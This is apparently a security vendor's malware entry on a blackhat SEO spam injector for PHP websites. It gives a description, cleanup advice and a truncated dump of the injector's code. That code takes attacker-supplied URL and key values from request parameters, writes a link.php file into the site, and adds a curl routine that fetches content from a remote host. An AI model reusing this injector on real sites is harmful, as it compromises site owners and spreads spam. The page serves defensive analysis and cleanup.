Blackhat SEO is a malicious technique used to manipulate the search engine results in order to benefit a website in terms of relevance.
This is the code responsible for injecting the conditional spam algorithm inside site's PHP files. It allows the attacker to insert, remove or even change the spam campaign that a website will be part of.
It has functions to autodetect popular CMSs and infect according to it.
Affecting
Any vulnerable website. Outdated software or compromised passwords can act as an infection vector.
Cleanup
Cleanup is done by deleting the malicious code inside the file or replacing it with a fresh version. The infection can be found in your system by searching for CURL requests inside your site's files.
You can also sign up with us and let our team remove the malware for you.
Dump
if ($req == "addd") {
echo "Try to add dor..." . "n";
$durl = $_GET['c'];
$durl = str_replace("\", "", $durl);
$dkey = "xxx";
$dkey = $_GET['k'];
$dkey = str_replace("\", "", $dkey);
$dfile = "link.php";
$dir = "../../..";
$cont = '<' . '?' . 'php $dor_dir = "' . $durl . '";' ;
$cont .= 'function get_content2($URL){$ch=curl_init();curl_setopt($ch,CURLOPT_URL,$URL);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);curl_setopt($ch,CURLOPT_USERAGENT,$_SERVER["HTTP_USER_AGENT"]);$result=curl_exec($ch);curl_close($ch);return $result;}';
/*